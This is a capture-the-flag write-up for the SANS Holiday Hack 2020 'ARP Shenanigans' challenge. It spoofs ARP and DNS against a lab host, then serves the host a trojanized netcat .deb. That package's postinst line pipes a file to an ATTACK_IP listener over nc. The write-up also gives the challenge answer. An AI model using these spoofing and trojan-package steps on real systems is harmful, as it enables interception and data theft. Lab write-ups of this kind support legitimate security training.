#:fontawesome-solid-check-circle:{: .green-text} Objective 9: ARP Shenanigans

*Difficulty:* :fontawesome-solid-tree:{: .red-text}:fontawesome-solid-tree:{: .red-text}:fontawesome-solid-tree:{: .red-text}:fontawesome-solid-tree:{: .red-text}:fontawesome-solid-tree:

Go to the NetWars room on the roof and help Alabaster Snowball get access back to a host using ARP. Retrieve the document at `/NORTH_POLE_Land_Use_Board_Meeting_Minutes.txt`. Who recused herself from the vote described on the document?

**TL;DR - [Answer](#answer)**

## Hints

> Jack Frost must have gotten malware on our host at 10.6.6.35 because we can no longer access it. Try sniffing the eth0 interface using `tcpdump -nni eth0` to see if you can view any traffic from that host.

> The host is performing an ARP request. Perhaps we could do a spoof to perform a machine-in-the-middle attack. I think we have some sample scapy traffic scripts that could help you in `/home/guest/scripts`.

> Hmmm, looks like the host does a DNS request after you successfully do an ARP spoof. Let's return a DNS response resolving the request to our IP.

> The malware on the host does an HTTP request for a .deb package. Maybe we can get command line access by sending it a [command in a customized .deb file](http://www.wannescolman.be/?p=98)

## Solution

As Alabaster suggests, let's sniff the traffic on `eth0` to see what's going on

```console
guest@d9e0a89218d1:~$ tcpdump -nni eth0
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes
11:08:54.556414 ARP, Request who-has 10.6.6.53 tell 10.6.6.35, length 28
11:08:55.592418 ARP, Request who-has 10.6.6.53 tell 10.6.6.35, length 28
11:08:56.632469 ARP, Request who-has 10.6.6.53 tell 10.6.6.35, length 28
```

We see `10.6.6.35` (the infected machine) continually sending a ARP request for the IP address `10.6.6.53`. If we can provide a fake ARP response, prehaps we can get the infected machine to talk to us instead. The `scripts` directory contains some starter code for ARP and DNS respones. [arp_resp.py](https://gitlab.com/malcrypt/hhc2020/-/blob/master/arp_shenanigans/arp_resp.py) provides an ARP response to this request that responses with our MAC address for the requested IP. If your Scapy skills are a bit rusty (or lacking), be sure to complete the [Scapy Prepper](../side_missions/scapy.md) challenge first.

At this point we will be moving between panes and windows in `tmux`, so completing the [Unescape Tmux](../side_missions/tmux.md) would be helpful.

With the ARP response script complete, we sniff traffic again in one pane while we execute the ARP response script in another.

```console hl_lines="6 7"
guest@d9e0a89218d1:~$ tcpdump -nni eth0
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes
11:15:19.724418 ARP, Request who-has 10.6.6.53 tell 10.6.6.35, length 28
11:15:20.760374 ARP, Request who-has 10.6.6.53 tell 10.6.6.35, length 28
11:15:20.780501 ARP, Reply 10.6.6.53 is-at 02:42:0a:06:00:02, length 28
11:15:20.801235 IP 10.6.6.35.46948 > 10.6.6.53.53: 0+ A? ftp.osuosl.org. (32)
11:15:21.796648 ARP, Request who-has 10.6.6.53 tell 10.6.6.35, length 28
```

The target machine received our ARP response and attempted to send a DNS request to our machine for the domain `ftp.osuosl.org`. Let's use our Scapy skills to response to this DNS request with the IP of our machine. [dns_resp.py](https://gitlab.com/malcrypt/hhc2020/-/blob/master/arp_shenanigans/dns_resp.py) implements this DNS response.

!!! note
    The ARP response script and the DNS response script each need to be in a separate file because they will be run at the same time. We have to run them at the same time because each is sniffing for traffic. If the two responses were placed in the same script sequentially, the infected machine would respond to the ARP response before we start listening for the DNS request. This could be overcome by using multiple threads, but it's just easier to run multiple scripts at the same time.

To test our DNS response script, we will

1. Start `tcpdump` to watch traffic
1. Start the `dns_resp.py` script
1. Start the `arp_resp.py` script

```console hl_lines="10"
guest@d9e0a89218d1:~$ tcpdump -nni eth0
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes
...
11:30:50.624443 ARP, Request who-has 10.6.6.53 tell 10.6.6.35, length 28
11:30:50.652590 ARP, Reply 10.6.6.53 is-at 02:42:0a:06:00:02, length 28
11:30:50.672874 IP 10.6.6.35.15070 > 10.6.6.53.53: 0+ A? ftp.osuosl.org. (32)
11:30:50.701529 IP 10.6.6.53.53 > 10.6.6.35.15070: 0- 1/0/0 A 10.6.0.2 (62)
...
11:30:50.722058 IP 10.6.6.35.48966 > 10.6.0.2.80: Flags [S], seq 484505286, win 64240, options [mss 1460,sackOK,TS val 2988208387 ecr 0,nop,wscale 7], length 0
11:30:50.722103 IP 10.6.0.2.80 > 10.6.6.35.48966: Flags [R.], seq 0, ack 484505287, win 0, length 0
```

The packet capture will sniff some other traffic from `10.6.6.35` that can be safely ignored for the sake of this challenge. The part that is interesting is the infected machine received our DNS response, and attempted to connect on TCP port `80`. So, it looks like the infected machine wants to talk to an HTTP server. We can use the python `http.server` to see what URL the machine is requesting. At this point we will have three panes with different commands open, run in this order:

1. `python3 -m http.server 80`
1. `python3 scripts/dns_resp.py`
1. `python3 scripts/arp_resp.py`

In the pane running the HTTP server we see that the infected machine is requesting a [`deb`](https://en.wikipedia.org/wiki/Deb_(file_format)) file with the URL `/pub/jfrost/backdoor/suriv_amd64.deb`

```console hl_lines="4"
guest@d9e0a89218d1:~$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.6.6.35 - - [24/Dec/2020 11:40:35] code 404, message File not found
10.6.6.35 - - [24/Dec/2020 11:40:35] "GET /pub/jfrost/backdoor/suriv_amd64.deb HTTP/1.1" 404 -
```
We don't know exactly what the machine is doing with the `deb`, but we can make an educated guess that it is retrieving the file and attempting to install it. If we can trojanize a `deb` to execute commands of our choosing, we can gain access to the infected machine.

!!! warning
    This challenge demonstrates why one must be very careful when installing `deb` files without verification.

The hints recommend [this article](http://www.wannescolman.be/?p=98) on trojanizing a `deb` file. Offensive Security also has an [article](https://www.offensive-security.com/metasploit-unleashed/binary-linux-trojan/) on the topic as part of their [Metasploit Unleashed](https://www.offensive-security.com/metasploit-unleashed/) course.

We are provided with a `debs` directory which contains `deb` files for common utilities like `gedit`, `socat`, etc; of particular interest is `netcat-traditional_1.10-41.1ubuntu1_amd64.deb`. Since we do not know if the target machine has `nc` installed, if we trojanize this `deb` we can install `nc` and run our malicious command with the same file.

Since our objective is only to retrieve the contents of a file, a full shell isn't really necessary, but could easily be attained via small script modifications.

First, we need to unpack the netcat `deb` file and create a few files.

```console
guest@d9e0a89218d1:~$ dpkg -x "netcat-traditional_1.10-41.1ubuntu1_amd64.deb" work
guest@d9e0a89218d1:~$ mkdir work/DEBIAN
guest@d9e0a89218d1:~$ ar -x "$netcat_deb"
guest@d9e0a89218d1:~$ tar xf control.tar.xz
guest@d9e0a89218d1:~$ mv control work/DEBIAN
guest@d9e0a89218d1:~$ touch work/DEBIAN/postinst
guest@d9e0a89218d1:~$ chmod 755 work/DEBIAN/postinst
```

The `control` file contains metadata about the `deb`. In this case we can reuse the file from the original package. The [`postinst`](https://man7.org/linux/man-pages/man5/deb-postinst.5.html) file allows package maintainers to run scripts after the installation of the `deb`. In our case, we will use it to run `nc` and send the file contents back to us. We'll modify it's contents to be:

```shell
#!/bin/sh

nc -q 3 ATTACK_IP 8080 < /NORTH_POLE_Land_Use_Board_Meeting_Minutes.txt
```
where `ATTACK_IP` is the IP address of the machine we are connected to.

At this point we're ready to build the trojanized `deb`.
```console
guest@d9e0a89218d1:~$ mkdir -p /tmp/http/pub/jfrost/backdoor
guest@d9e0a89218d1:~$ dpkg-deb --build work /tmp/http/pub/jfrost/backdoor/suriv_amd64.deb
```

If you're lazy, [exploit.sh](https://gitlab.com/malcrypt/hhc2020/-/blob/master/arp_shenanigans/exploit.sh) will handle writing the response scripts and creating the trojan `deb` file. Once the files have been written, execute each of these commands (in this order) in separate windows

* `cd /tmp/http && python3 -m http.server 80`
* `netcat -lp 8080 > minutes.txt`
* `python3 dns_resp.py`
* `python3 arp_resp.py`

The minutes from the meeting will be in [`minutes.txt`](https://gitlab.com/malcrypt/hhc2020/-/blob/master/arp_shenanigans/minutes.txt)

## Answer

**Tanta Kringle**
